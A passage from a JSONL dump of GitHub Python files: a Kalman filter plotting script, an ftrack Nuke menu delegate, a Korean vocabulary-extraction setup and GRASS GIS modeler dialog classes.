system\r\n    return np.eye(dim_z, num_states)\r\n\r\n\r\nekf.h = h\r\nekf.H = H\r\n\r\n\r\n# Define process noise covariance and measurement noise covariance\r\nekf.Q = np.eye(num_states) * 0.01\r\nekf.R = np.eye(dim_z) * 0.1 # Adjust the value to control the filtering of measurement noise\r\n\r\n\r\n# Extract original data for plotting\r\noriginal_acc = data[['Acc_X', 'Acc_Y', 'Acc_Z']].values\r\noriginal_gyro = data[['Gyro_X', 'Gyro_Y', 'Gyro_Z']].values\r\noriginal_lat = data['Lat'].values\r\noriginal_long = data['Long'].values\r\n\r\n# Define the Jacobian matrix of the measurement function\r\ndef HJacobian(x):\r\n    # Modify this function based on the Jacobian of your system\r\n    return np.eye(dim_z, num_states)\r\n\r\n\r\n# Define the predicted measurement function\r\ndef Hx(x):\r\n    # Modify this function based on the predicted measurement equations of your system\r\n    return x\r\n\r\n\r\n# Set the HJacobian and Hx functions in the ExtendedKalmanFilter object\r\nekf.HJacobian = HJacobian\r\nekf.Hx = Hx\r\n\r\n# Track the object using the Extended Kalman filter\r\nfiltered_states = []\r\nfor _, row in data.iterrows():\r\n    measurement = row[columns].values.astype(np.float64)\r\n    ekf.predict()\r\n    ekf.update(measurement,HJacobian,Hx)\r\n    filtered_states.append(ekf.x.copy())\r\n\r\n\r\n# Convert filtered states to numpy array\r\nfiltered_states = np.array(filtered_states)\r\n\r\n\r\n# Extract filtered data for plotting\r\nfiltered_acc = filtered_states[:, :3]\r\nfiltered_gyro = filtered_states[:, 5:8]\r\nfiltered_lat = filtered_states[:, 4] # 'Lat' is column index 4 of the columns list\r\nfiltered_long = filtered_states[:, 3] # 'Long' is column index 3 of the columns list\r\n\r\n\r\n# Plot the original and filtered trajectories\r\nplt.figure(figsize=(18, 12))\r\n\r\n# Plot original acceleration\r\nplt.subplot(2, 4, 1)\r\nplt.plot(original_acc[:, 0], label='Original Acc_X')\r\nplt.plot(original_acc[:, 1], label='Original Acc_Y')\r\nplt.plot(original_acc[:, 2], label='Original Acc_Z')\r\nplt.xlabel('Index')\r\nplt.ylabel('Acceleration')\r\nplt.title('Original Acceleration')\r\nplt.legend(loc='upper right')\r\n\r\n\r\n# Plot original gyroscope\r\nplt.subplot(2, 4, 2)\r\nplt.plot(original_gyro[:, 0], label='Original Gyro_X')\r\nplt.plot(original_gyro[:, 1], label='Original Gyro_Y')\r\nplt.plot(original_gyro[:, 2], label='Original Gyro_Z')\r\nplt.xlabel('Index')\r\nplt.ylabel('Angular Velocity')\r\nplt.title('Original Gyro')\r\nplt.legend(loc='upper right')\r\n\r\n\r\n# Plot original latitude\r\nplt.subplot(2, 4, 3)\r\nplt.plot(original_lat, label='Original 
Latitude')\r\nplt.xlabel('Index')\r\nplt.ylabel('Latitude')\r\nplt.title('Original Latitude')\r\nplt.legend(loc='upper right')\r\n\r\n\r\n# Plot original longitude\r\nplt.subplot(2, 4, 4)\r\nplt.plot(original_long, label='Original Longitude')\r\nplt.xlabel('Index')\r\nplt.ylabel('Longitude')\r\nplt.title('Original Longitude')\r\nplt.legend(loc='upper right')\r\n\r\n\r\n# Plot filtered acceleration\r\nplt.subplot(2, 4, 5)\r\nplt.plot(filtered_acc[:, 0], label='Filtered Acc_X')\r\nplt.plot(filtered_acc[:, 1], label='Filtered Acc_Y')\r\nplt.plot(filtered_acc[:, 2], label='Filtered Acc_Z')\r\nplt.xlabel('Index')\r\nplt.ylabel('Acceleration')\r\nplt.title('Filtered Acceleration')\r\nplt.legend(loc='upper right')\r\n\r\n\r\n# Plot filtered gyroscope\r\nplt.subplot(2, 4, 6)\r\nplt.plot(filtered_gyro[:, 0], label='Filtered Gyro_X')\r\nplt.plot(filtered_gyro[:, 1], label='Filtered Gyro_Y')\r\nplt.plot(filtered_gyro[:, 2], label='Filtered Gyro_Z')\r\nplt.xlabel('Index')\r\nplt.ylabel('Angular Velocity')\r\nplt.title('Filtered Gyro')\r\nplt.legend(loc='upper right')\r\n\r\n\r\n# Plot filtered latitude\r\nplt.subplot(2, 4, 7)\r\nplt.plot(filtered_lat, label='Filtered Latitude')\r\nplt.xlabel('Index')\r\nplt.ylabel('Latitude')\r\nplt.title('Filtered Latitude')\r\nplt.legend(loc='upper right')\r\n\r\n\r\n# Plot filtered longitude\r\nplt.subplot(2, 4, 8)\r\nplt.plot(filtered_long, label='Filtered Longitude')\r\nplt.xlabel('Index')\r\nplt.ylabel('Longitude')\r\nplt.title('Filtered Longitude')\r\nplt.legend(loc='upper right')\r\n\r\n\r\nplt.tight_layout()\r\nplt.show()\r\n\r\n","repo_name":"SHAIKVAZEERAHAMED/KF-EKF","sub_path":"vaz22.py","file_name":"vaz22.py","file_ext":"py","file_size_in_byte":5552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"18760247086","text":"import FnAssetAPI\nfrom ftrack_connect_foundry.ui import delegate\n\nimport ftrack_connect.ui.theme\n\n\nclass Delegate(delegate.Delegate):\n def __init__(self, bridge):\n super(Delegate, self).__init__(bridge)\n\n self.moduleName = \".\".join(__name__.split(\".\")[:-1])\n\n def populate_ftrack(self):\n\n import nuke\n import legacy\n from nukescripts import panels\n\n from ftrack_connect_nuke.ui.widget.crew import NukeCrew\n from ftrack_connect_nuke.connector import Connector\n\n # Check if QtWebKit or QWebEngine is avaliable.\n from FnAssetAPI.ui.toolkit import is_webwidget_supported\n has_webwidgets = is_webwidget_supported()\n\n Connector.registerAssets()\n\n # wrappers for initializing the widgets with\n # the correct connector object\n def wrapImportAssetDialog(*args, **kwargs):\n from ftrack_connect.ui.widget.import_asset import FtrackImportAssetDialog\n return FtrackImportAssetDialog(connector=Connector())\n\n def wrapAssetManagerDialog(*args, **kwargs):\n from ftrack_connect.ui.widget.asset_manager import FtrackAssetManagerDialog\n return FtrackAssetManagerDialog(connector=Connector())\n\n # Populate the ui\n nukeMenu = nuke.menu(\"Nuke\")\n ftrackMenu = nukeMenu.addMenu(\"&ftrack\")\n\n ftrackMenu.addSeparator()\n\n # add ftrack publish node to the menu\n ftrackMenu.addCommand('Create Publish Node', lambda: legacy.createFtrackPublish())\n\n ftrackMenu.addSeparator()\n\n globals()['ftrackImportAssetClass'] = wrapImportAssetDialog\n\n panels.registerWidgetAsPanel(\n '{0}.{1}'.format(__name__, 'ftrackImportAssetClass'),\n 'ftrackImportAsset',\n 'ftrackDialogs.ftrackImportAssetDialog'\n )\n\n ftrackMenu.addSeparator()\n\n ftrackMenu.addCommand(\n 'Import Asset',\n 'pane = 
nuke.getPaneFor(\"Properties.1\");'\n 'panel = nukescripts.restorePanel(\"ftrackDialogs.ftrackImportAssetDialog\");'\n 'panel.addToPane(pane)'\n )\n\n globals()['ftrackAssetManagerDialogClass'] = wrapAssetManagerDialog\n\n # Create the asset manager dialog entry in the menu\n panels.registerWidgetAsPanel(\n '{0}.{1}'.format(__name__, 'ftrackAssetManagerDialogClass'),\n 'ftrackAssetManager',\n 'ftrackDialogs.ftrackAssetManagerDialog'\n )\n ftrackMenu.addCommand(\n 'Asset Manager',\n 'pane = nuke.getPaneFor(\"Properties.1\");'\n 'panel = nukescripts.restorePanel(\"ftrackDialogs.ftrackAssetManagerDialog\");'\n 'panel.addToPane(pane)'\n )\n\n if has_webwidgets:\n from ftrack_connect_foundry.ui.info_view import InfoView as _InfoView\n\n ftrackMenu.addCommand(\n _InfoView.getDisplayName(),\n 'pane = nuke.getPaneFor(\"Properties.1\");'\n 'panel = nukescripts.restorePanel(\"{identifier}\");'\n 'panel.addToPane(pane)'.format(\n identifier=_InfoView.getIdentifier()\n )\n )\n\n ftrackMenu.addSeparator()\n\n if has_webwidgets:\n from ftrack_connect_foundry.ui.info_view import WorkingTaskInfoView as _WorkingTaskInfoView\n from ftrack_connect_foundry.ui.tasks_view import TasksView as _TasksView\n\n # Add Web Views located in the ftrack_connect_foundry package to the\n # menu for easier access.\n for widget in [\n _TasksView,\n _WorkingTaskInfoView\n ]:\n ftrackMenu.addCommand(\n widget.getDisplayName(),\n 'pane = nuke.getPaneFor(\"Properties.1\");'\n 'panel = nukescripts.restorePanel(\"{identifier}\");'\n 'panel.addToPane(pane)'.format(\n identifier=widget.getIdentifier()\n )\n )\n\n ftrackMenu.addSeparator()\n\n # Create the crew dialog entry in the menu\n panels.registerWidgetAsPanel(\n 'ftrack_connect_nuke.ui.widget.crew.NukeCrew',\n 'Crew',\n 'widget.Crew'\n )\n ftrackMenu.addCommand(\n 'Crew',\n 'pane = nuke.getPaneFor(\"Properties.1\");'\n 'panel = nukescripts.restorePanel(\"widget.Crew\");'\n 'panel.addToPane(pane)'\n )\n\n # Add new entries in the ftrack menu.\n ftrackMenu.addSeparator()\n\n if has_webwidgets:\n from ftrack_connect_nuke.ui.widget.publish_gizmo import GizmoPublisherDialog\n ftrackMenu.addCommand('Publish gizmo', GizmoPublisherDialog)\n\n # Add ftrack publish node\n toolbar = nuke.toolbar(\"Nodes\")\n ftrackNodesMenu = toolbar.addMenu(\"ftrack\", icon=\"logobox.png\")\n ftrackNodesMenu.addCommand('ftrackPublish', lambda: legacy.createFtrackPublish())\n\n # Set calbacks\n nuke.addOnScriptLoad(legacy.refAssetManager)\n nuke.addOnScriptLoad(legacy.scan_for_new_assets)\n nuke.addOnUserCreate(legacy.addFtrackComponentField, nodeClass='Write')\n nuke.addOnUserCreate(legacy.addFtrackComponentField, nodeClass='WriteGeo')\n nuke.addOnUserCreate(legacy.addFtrackComponentField, nodeClass='Read')\n nuke.addKnobChanged(legacy.ftrackPublishKnobChanged, nodeClass=\"Group\")\n nuke.addOnCreate(legacy.ftrackPublishHieroInit)\n\n def populateUI(self, uiElement, specification, context):\n super(Delegate, self).populateUI(uiElement, specification, context)\n\n host = FnAssetAPI.SessionManager.currentSession().getHost()\n\n if host and host.getIdentifier() == 'uk.co.foundry.nuke':\n self.populate_ftrack()\n\n # Set font on QApplication once UI is created.\n # We do this once since it takes some time to apply the font.\n 
ftrack_connect.ui.theme.applyFont()\n","repo_name":"IngenuityEngine/ftrack-connect-nuke","sub_path":"source/ftrack_connect_nuke/ui/delegate.py","file_name":"delegate.py","file_ext":"py","file_size_in_byte":5965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"23181848574","text":"from vocab_tools import vocab_extractor\n\n'''\nmain.py: EXTRACT WORD/N-GRAM WORDS FROM INPUT TEXTS\n\nit includes functions below.\n\nFunction 0. IMPORT files\n- Import all files inside a folder.\n(This function takes into account the subfolder structures.)\n\nFunction 1. EXTRACT texts\n- Extract texts inside the files.\n(files must be *.pdf or *.hwp)\n\nFunction 2. EXTRACT words from texts\n- If the word you are extracting is a word with one morpheme, use the part-of-speech tag filter; \nif the word is a word with more than one morpheme, extract all n-gram words that appear more than once.\n- Don't do frequency-based filtering in this session because you'll need to consider the result of multiple files combined together;\ndo it later when you combine the files.\n\nFunction 3. SAVE results\n- Save to pickles\n'''\n\n## DEFINE VARIABLES\n# Part-of-speech templates to base lexical extractions on\n# [('EC',)\ntemplates = [\n # 한 단어로 구성된\n ('NNG',),\n ('NNP',),\n ('VV',),\n ('VA',),\n ('VV-I',),\n ('VA-I',),\n ('VV-R',),\n ('VA-R',),\n ('MAG',),\n ('XR',),\n ('SL',),\n\n # 두 단어로 구성된\n ('NNG', 'NNG',),\n # ('NNG', 'SO',),\n ('NNG', 'XSA',),\n ('NNG', 'XSA-I',),\n ('NNG', 'XSA-R',),\n ('NNG', 'XSN',),\n ('NNG', 'XSV',),\n ('NP', 'NNG',),\n ('SN', 'NNG',),\n ('SN', 'SL',),\n ('SL', 'NNG',), #DNA폴리머라아제, QR코드\n ('XR', 'XSN',), #어근+접미사\n ('XR', 'XSV',),\n ('XR', 'XSA',),\n ('XR', 'XSA-I',),\n ('XR', 'XSA-R',),\n ('XR', 'XSM',),\n ('XPN', 'NNG',),#접두사+명,동,형\n ('XPN', 'VV',),\n ('XPN', 'VA',),\n ('XPN', 'VV-I',),\n ('XPN', 'VA-I',),\n ('XPN', 'VV-R',),\n ('XPN', 'VA-R',),\n\n\n\n # 세 단어로 구성된\n ('SN', '', 'NNG',), #3D프린터, 2가염색체\n ('SL', '', 'NNG',), #DNA중합효소\n ('SN', '', '', 'NNG',), #3D레이져프린터\n ('NNG', 'JC', 'NNG',),\n ('NNG', 'JC', 'NNP',),\n ('NNG', 'JKG', 'NNG',),\n ('NNG', 'JKO', 'NNG',),\n ('NNG', 'JKO', 'VV-I',),\n ('NNG', 'JKO', 'VV-R',),\n ('NNG', 'JKO', 'VV',),\n ('NNG', 'NNG', 'NNG',),\n ('NNG', 'NNG', 'XSN',),\n\n # 네 단어로 구성된\n ('NNG', 'NNG', 'NNG', 'NNG',),\n ('SN', 'NNG', 'NNG', 'NNG',), #('3SN', '차원NNG', '공간NNG', '좌표NNG'),\n ('SN', 'SL', 'NNG', 'NNG',), #('3SN', 'DSL', '레이저NNG', '스캐너NNG'),\n ('SN', 'NNB', 'NNG', 'NNG',) #('2SN', '차NNB', '세계NNG', '대전NNG'),\n]\n # ('/NNG',), ('/NNP',), ('/VV',), ('/VA',), ('/MAG',), ('/XR',), ('/SL',), # mono-gram\n # ('',) * 2,\n # ('',) * 3,\n # ('',) * 4\n\ntdir = {\n 'ksat': '/Users/kintch/Library/CloudStorage/Dropbox/sj/2023-1/연구/[진행중]수능 비문학지문 친숙하지 않은 어휘 (독서학회) 10_3마감/텍스트 자료/수능 비문학 텍스트 자료/수능txt',\n 'ebs': '/Users/kintch/Library/CloudStorage/Dropbox/sj/2023-1/연구/[진행중]수능 비문학지문 친숙하지 않은 어휘 (독서학회) 10_3마감/텍스트 자료/ebs 텍스트 자료',\n 'textbook': '/Users/kintch/Library/CloudStorage/Dropbox/sj/2023-1/연구/[진행중]수능 비문학지문 친숙하지 않은 어휘 (독서학회) 10_3마감/텍스트 자료/교과서 텍스트 자료'\n}\npickle_save_dir_ground0 = \"/Users/kintch/Library/CloudStorage/Dropbox/sj/2023-1/연구/[진행중]수능 비문학지문 친숙하지 않은 어휘 (독서학회) 10_3마감/5. pickles/\"\nngram_range = (1, 4) # (a,b); from a to b (not b-1)\n\n\n## EXTRACT VOCABULARY (for each folders & files) & SAVE TO PICKLES\nvocab_extractor(source_text_dir=tdir, pos_templates=templates, pickle_save_dir=pickle_save_dir_ground0, min_count_num=1, ngram_range=(1,4))\n\n\n# test용 저장\n# with open('/Users/kintch/Dropbox/sj/2022-2/4. 
수능 비문학지문 친숙하지 않은 어휘 (독서학회) 10:3마감/텍스트 자료/test.txt',\n# 'w', encoding='utf-8') as f:\n# for ngram, freq in counted_ngram_5.items():\n# f.writelines(str(ngram) + ':' + str(freq) + '\\n')\n\n# 어휘 추출\n\n# outparallel_2_spaced = [spacing(x) for x in outparallel_2]\n\n# from tqdm import tqdm\n# outparallel_2_spaced = list()\n# for x in tqdm(outparallel_2):\n# outparallel_2_spaced.append(spacing(x))\n\n\n# test ----------------------------------------------------\n# test= '분열 감염성 질병 갑상샘 개체 개체 수 개체군 개체군의 밀도 개체군의 생장 겉질 결실 고사량 고양이 울음 증후군 고유종 고지혈증 골격근 공생 과분극 관목 교감 신경 구균 구심성 뉴런 군집 군체 귀납적 탐구 방법'\n# test1 = '2 가 염색체 2 차 면역 반응 2 차 소비자 2 차 천이 II형 생존 곡선 이화 작용 인슐린 인플루엔자 바이러스 1 차 면역 반응 1 차 소비자 1 차 천이 I형 생존 곡선'\n# test2 = '생물다양성이감소하는원인은외래종의도입,서식지파괴와 단편화,불법포획과남획,환경오염및��후변화등이있다.'\n# test3 = '버들붕어 개체군 내에서는 텃세가 나타난다. 자신의 세 력권을 형성하여 자신의 영역을 유지하며 다른 개체 와의 경 쟁을 줄여 개체군을 유지한다.'\n\n\n# a = '형질 내세망'\n# b = '인슐린 의존성 당뇨'\n# c = 'ⓐ와 ⓑ는 ATP와 ADP +Pi 중 하나이다.'\n\n\n# from mecab import MeCab\n# mecab = MeCab()\n#\n# mecab.pos('생물다양성은철도,도로등의건설로인한단편화,외래종의 무차별적인도입,무분별한남획등에의해감소한다.')\n# spacing()\n# okt.pos('생물다양성은철도,도로등의건설로인한단편화,외래종의 무차별적인도입,무분별한남획등에의해감소한다.', norm=True)\n","repo_name":"newdboy/KSAT_nonfiction_word","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6414,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"18886623360","text":"\"\"\"!\n@package gmodeler.dialogs\n\n@brief wxGUI Graphical Modeler - dialogs\n\nClasses:\n - dialogs::ModelDataDialog\n - dialogs::ModelSearchDialog\n - dialogs::ModelRelationDialog\n - dialogs::ModelItemDialog\n - dialogs::ModelLoopDialog\n - dialogs::ModelConditionDialog\n - dialogs::ModelListCtrl\n - dialogs::ValiableListCtrl\n - dialogs::ItemListCtrl\n - dialogs::ItemCheckListCtrl\n\n(C) 2010-2011 by the GRASS Development Team\n\nThis program is free software under the GNU General Public License\n(>=v2). 
Read the file COPYING that comes with GRASS for details.\n\n@author Martin Landa <landa.martin gmail.com>\n\"\"\"\n\nimport os\nimport sys\n\nimport wx\nimport wx.lib.mixins.listctrl as listmix\n\nfrom core import globalvar\nfrom core import utils\nfrom gui_core.widgets import GNotebook\nfrom core.gcmd import GError, EncodeString\nfrom gui_core.dialogs import ElementDialog, MapLayersDialog\nfrom gui_core.ghelp import SearchModuleWindow\nfrom gui_core.prompt import GPromptSTC\nfrom gui_core.forms import CmdPanel\nfrom gui_core.gselect import Select\nfrom gmodeler.model import *\n\nfrom grass.script import task as gtask\n\nclass ModelDataDialog(ElementDialog):\n    \"\"\"!Data item properties dialog\"\"\"\n    def __init__(self, parent, shape, id = wx.ID_ANY, title = _(\"Data properties\"),\n                 style = wx.DEFAULT_DIALOG_STYLE | wx.RESIZE_BORDER):\n        self.parent = parent\n        self.shape = shape\n        \n        label, etype = self._getLabel()\n        ElementDialog.__init__(self, parent, title, label = label, etype = etype)\n        \n        self.element = Select(parent = self.panel)\n        self.element.SetValue(shape.GetValue())\n        \n        self.Bind(wx.EVT_BUTTON, self.OnOK, self.btnOK)\n        self.Bind(wx.EVT_BUTTON, self.OnCancel, self.btnCancel)\n        \n        self.PostInit()\n        \n        if shape.GetValue():\n            self.btnOK.Enable()\n        \n        self._layout()\n        self.SetMinSize(self.GetSize())\n        \n    def _getLabel(self):\n        etype = False\n        prompt = self.shape.GetPrompt()\n        if prompt == 'raster':\n            label = _('Name of raster map:')\n        elif prompt == 'vector':\n            label = _('Name of vector map:')\n        else:\n            etype = True\n            label = _('Name of element:')\n\n        return label, etype\n    \n    def _layout(self):\n        \"\"\"!Do layout\"\"\"\n        self.dataSizer.Add(self.element, proportion=0,\n                           flag=wx.EXPAND | wx.ALL, border=1)\n        \n        self.panel.SetSizer(self.sizer)\n        self.sizer.Fit(self)\n\n    def OnOK(self, event):\n        \"\"\"!Ok pressed\"\"\"\n        self.shape.SetValue(self.GetElement())\n        if self.etype:\n            elem = self.GetType()\n            if elem == 'rast':\n                self.shape.SetPrompt('raster')\n            elif elem == 'vect':\n                self.shape.SetPrompt('vector')\n        \n        self.parent.canvas.Refresh()\n        self.parent.SetStatusText('', 0)\n        self.shape.SetPropDialog(None)\n        \n        if self.IsModal():\n            event.Skip() \n        else:\n            self.Destroy()\n    \n    def OnCancel(self, event):\n        \"\"\"!Cancel pressed\"\"\"\n        self.shape.SetPropDialog(None)\n        if self.IsModal():\n            event.Skip()\n        else:\n            self.Destroy()\n\nclass ModelSearchDialog(wx.Dialog):\n    def __init__(self, parent, id = wx.ID_ANY, title = _(\"Add new GRASS module to the model\"),\n                 style = wx.DEFAULT_DIALOG_STYLE | wx.RESIZE_BORDER, **kwargs):\n        \"\"\"!Graphical modeler module search window\n        \n        @param parent parent window\n        @param id window id\n        @param title window title\n        @param kwargs wx.Dialogs' arguments\n        \"\"\"\n        self.parent = parent\n        \n        wx.Dialog.__init__(self, parent = parent, id = id, title = title, **kwargs)\n        self.SetName(\"ModelerDialog\")\n        self.SetIcon(wx.Icon(os.path.join(globalvar.ETCICONDIR, 'grass.ico'), wx.BITMAP_TYPE_ICO))\n        \n        self.panel = wx.Panel(parent = self, id = wx.ID_ANY)\n        \n        self.cmdBox = wx.StaticBox(parent = self.panel, id = wx.ID_ANY,\n                                   label=\" %s \" % _(\"Command\"))\n        \n        self.cmd_prompt = GPromptSTC(parent = self)\n        self.search = SearchModuleWindow(parent = self.panel, cmdPrompt = self.cmd_prompt, showTip = True)\n        wx.CallAfter(self.cmd_prompt.SetFocus)\n        \n        # get commands\n        items = self.cmd_prompt.GetCommandItems()\n        \n        self.btnCancel = wx.Button(self.panel, wx.ID_CANCEL)\n        self.btnOk = wx.Button(self.panel, wx.ID_OK)\n        self.btnOk.SetDefault()\n        self.btnOk.Enable(False)\n\n        
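# enable the OK button from OnText once the prompt holds a command\n        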
self.cmd_prompt.Bind(wx.EVT_KEY_UP, self.OnText)\n self.search.searchChoice.Bind(wx.EVT_CHOICE, self.OnText)\n self.Bind(wx.EVT_BUTTON, self.OnOk, self.btnOk)\n self.Bind(wx.EVT_BUTTON, self.OnCancel, self.btnCancel)\n \n self._layout()\n \n self.SetSize((500, 275))\n \n def _layout(self):\n cmdSizer = wx.StaticBoxSizer(self.cmdBox, wx.VERTICAL)\n cmdSizer.Add(item = self.cmd_prompt, proportion = 1,\n flag = wx.EXPAND)\n \n btnSizer = wx.StdDialogButtonSizer()\n btnSizer.AddButton(self.btnCancel)\n btnSizer.AddButton(self.btnOk)\n btnSizer.Realize()\n \n mainSizer = wx.BoxSizer(wx.VERTICAL)\n mainSizer.Add(item = self.search, proportion = 0,\n flag = wx.EXPAND | wx.ALL, border = 3)\n mainSizer.Add(item = cmdSizer, proportion = 1,\n flag = wx.EXPAND | wx.LEFT | wx.RIGHT | wx.TOP, border = 3)\n mainSizer.Add(item = btnSizer, proportion = 0,\n flag = wx.EXPAND | wx.ALL | wx.ALIGN_CENTER, border = 5)\n \n self.panel.SetSizer(mainSizer)\n mainSizer.Fit(self.panel)\n \n self.Layout()\n\n def GetPanel(self):\n \"\"\"!Get dialog panel\"\"\"\n return self.panel\n\n def GetCmd(self):\n \"\"\"!Get command\"\"\"\n line = self.cmd_prompt.GetCurLine()[0].strip()\n if len(line) == 0:\n return list()\n \n try:\n cmd = utils.split(str(line))\n except UnicodeError:\n cmd = utils.split(EncodeString(line))\n \n return cmd\n \n def OnOk(self, event):\n \"\"\"!Button 'OK' pressed\"\"\"\n # hide autocomplete\n if self.cmd_prompt.AutoCompActive():\n self.cmd_prompt.AutoCompCancel()\n \n self.btnOk.SetFocus()\n cmd = self.GetCmd()\n \n if len(cmd) < 1:\n GError(parent = self,\n message = _(\"Command not defined.\\n\\n\"\n \"Unable to add new action to the model.\"))\n return\n \n if cmd[0] not in globalvar.grassCmd:\n GError(parent = self,\n message = _(\"'%s' is not a GRASS module.\\n\\n\"\n \"Unable to add new action to the model.\") % cmd[0])\n return\n \n self.EndModal(wx.ID_OK)\n \n def OnCancel(self, event):\n \"\"\"Cancel pressed, close window\"\"\"\n # hide autocomplete\n if self.cmd_prompt.AutoCompActive():\n self.cmd_prompt.AutoCompCancel()\n \n self.Hide()\n \n def OnText(self, event):\n \"\"\"!Text in prompt changed\"\"\"\n if self.cmd_prompt.AutoCompActive():\n event.Skip()\n return\n \n if isinstance(event, wx.KeyEvent):\n entry = self.cmd_prompt.GetTextLeft()\n elif isinstance(event, wx.stc.StyledTextEvent):\n entry = event.GetText()\n else:\n entry = event.GetString()\n \n if entry:\n self.btnOk.Enable()\n else:\n self.btnOk.Enable(False)\n \n event.Skip()\n \n def Reset(self):\n \"\"\"!Reset dialog\"\"\"\n self.search.Reset()\n self.cmd_prompt.OnCmdErase(None)\n self.btnOk.Enable(False)\n self.cmd_prompt.SetFocus()\n\nclass ModelRelationDialog(wx.Dialog):\n \"\"\"!Relation properties dialog\"\"\"\n def __init__(self, parent, shape, id = wx.ID_ANY, title = _(\"Relation properties\"),\n style = wx.DEFAULT_DIALOG_STYLE | wx.RESIZE_BORDER, **kwargs):\n self.parent = parent\n self.shape = shape\n \n options = self._getOptions()\n if not options:\n self.valid = False\n return\n \n self.valid = True\n wx.Dialog.__init__(self, parent, id, title, style = style, **kwargs)\n self.SetIcon(wx.Icon(os.path.join(globalvar.ETCICONDIR, 'grass.ico'), wx.BITMAP_TYPE_ICO))\n \n self.panel = wx.Panel(parent = self, id = wx.ID_ANY)\n \n self.fromBox = wx.StaticBox(parent = self.panel, id = wx.ID_ANY,\n label = \" %s \" % _(\"From\"))\n self.toBox = wx.StaticBox(parent = self.panel, id = wx.ID_ANY,\n label = \" %s \" % _(\"To\"))\n \n self.option = wx.ComboBox(parent = self.panel, id = wx.ID_ANY,\n style = 
wx.CB_READONLY,\n choices = options)\n self.option.Bind(wx.EVT_COMBOBOX, self.OnOption)\n \n self.btnCancel = wx.Button(self.panel, wx.ID_CANCEL)\n self.btnOk = wx.Button(self.panel, wx.ID_OK)\n self.btnOk.Enable(False)\n \n self._layout()\n\n def _layout(self):\n mainSizer = wx.BoxSizer(wx.VERTICAL)\n\n fromSizer = wx.StaticBoxSizer(self.fromBox, wx.VERTICAL)\n self._layoutShape(shape = self.shape.GetFrom(), sizer = fromSizer)\n toSizer = wx.StaticBoxSizer(self.toBox, wx.VERTICAL)\n self._layoutShape(shape = self.shape.GetTo(), sizer = toSizer)\n\n btnSizer = wx.StdDialogButtonSizer()\n btnSizer.AddButton(self.btnCancel)\n btnSizer.AddButton(self.btnOk)\n btnSizer.Realize()\n \n mainSizer.Add(item = fromSizer, proportion = 0,\n flag = wx.EXPAND | wx.ALL, border = 5)\n mainSizer.Add(item = toSizer, proportion = 0,\n flag = wx.EXPAND | wx.LEFT | wx.RIGHT | wx.BOTTOM, border = 5)\n mainSizer.Add(item = btnSizer, proportion = 0,\n flag = wx.EXPAND | wx.ALL | wx.ALIGN_CENTER, border = 5)\n \n self.panel.SetSizer(mainSizer)\n mainSizer.Fit(self.panel)\n \n self.Layout()\n self.SetSize(self.GetBestSize())\n \n def _layoutShape(self, shape, sizer):\n if isinstance(shape, ModelData):\n sizer.Add(item = wx.StaticText(parent = self.panel, id = wx.ID_ANY,\n label = _(\"Data: %s\") % shape.GetLog()),\n proportion = 1, flag = wx.EXPAND | wx.ALL,\n border = 5)\n elif isinstance(shape, ModelAction):\n gridSizer = wx.GridBagSizer (hgap = 5, vgap = 5)\n gridSizer.Add(item = wx.StaticText(parent = self.panel, id = wx.ID_ANY,\n label = _(\"Command:\")),\n pos = (0, 0))\n gridSizer.Add(item = wx.StaticText(parent = self.panel, id = wx.ID_ANY,\n label = shape.GetName()),\n pos = (0, 1))\n gridSizer.Add(item = wx.StaticText(parent = self.panel, id = wx.ID_ANY,\n label = _(\"Option:\")),\n flag = wx.ALIGN_CENTER_VERTICAL,\n pos = (1, 0))\n gridSizer.Add(item = self.option,\n pos = (1, 1))\n sizer.Add(item = gridSizer,\n proportion = 1, flag = wx.EXPAND | wx.ALL,\n border = 5)\n \n def _getOptions(self):\n \"\"\"!Get relevant options\"\"\"\n items = []\n fromShape = self.shape.GetFrom()\n if not isinstance(fromShape, ModelData):\n GError(parent = self.parent,\n message = _(\"Relation doesn't start with data item.\\n\"\n \"Unable to add relation.\"))\n return items\n \n toShape = self.shape.GetTo()\n if not isinstance(toShape, ModelAction):\n GError(parent = self.parent,\n message = _(\"Relation doesn't point to GRASS command.\\n\"\n \"Unable to add relation.\"))\n return items\n \n prompt = fromShape.GetPrompt()\n task = toShape.GetTask()\n for p in task.get_options()['params']:\n if p.get('prompt', '') == prompt and \\\n 'name' in p:\n items.append(p['name'])\n \n if not items:\n GError(parent = self.parent,\n message = _(\"No relevant option found.\\n\"\n \"Unable to add relation.\"))\n return items\n \n def GetOption(self):\n \"\"\"!Get selected option\"\"\"\n return self.option.GetStringSelection()\n \n def IsValid(self):\n \"\"\"!Check if relation is valid\"\"\"\n return self.valid\n \n def OnOption(self, event):\n \"\"\"!Set option\"\"\"\n if event.GetString():\n self.btnOk.Enable()\n else:\n self.btnOk.Enable(False)\n\nclass ModelItemDialog(wx.Dialog):\n \"\"\"!Abstract item properties dialog\"\"\"\n def __init__(self, parent, shape, title, id = wx.ID_ANY,\n style = wx.DEFAULT_DIALOG_STYLE | wx.RESIZE_BORDER, **kwargs):\n self.parent = parent\n self.shape = shape\n \n wx.Dialog.__init__(self, parent, id, title = title, style = style, **kwargs)\n \n self.panel = wx.Panel(parent = self, id = wx.ID_ANY)\n \n 
self.condBox = wx.StaticBox(parent = self.panel, id = wx.ID_ANY,\n label=\" %s \" % _(\"Condition\"))\n self.condText = wx.TextCtrl(parent = self.panel, id = wx.ID_ANY,\n value = shape.GetText())\n \n self.itemList = ItemCheckListCtrl(parent = self.panel,\n window = self,\n columns = [_(\"ID\"), _(\"Name\"),\n _(\"Command\")],\n shape = shape)\n self.itemList.Populate(self.parent.GetModel().GetItems())\n \n self.btnCancel = wx.Button(parent = self.panel, id = wx.ID_CANCEL)\n self.btnOk = wx.Button(parent = self.panel, id = wx.ID_OK)\n self.btnOk.SetDefault()\n \n def _layout(self):\n \"\"\"!Do layout (virtual method)\"\"\"\n pass\n \n def GetCondition(self):\n \"\"\"!Get loop condition\"\"\"\n return self.condText.GetValue()\n\nclass ModelLoopDialog(ModelItemDialog):\n \"\"\"!Loop properties dialog\"\"\"\n def __init__(self, parent, shape, id = wx.ID_ANY, title = _(\"Loop properties\"),\n style = wx.DEFAULT_DIALOG_STYLE | wx.RESIZE_BORDER, **kwargs):\n ModelItemDialog.__init__(self, parent, shape, title,\n style = style, **kwargs)\n \n self.listBox 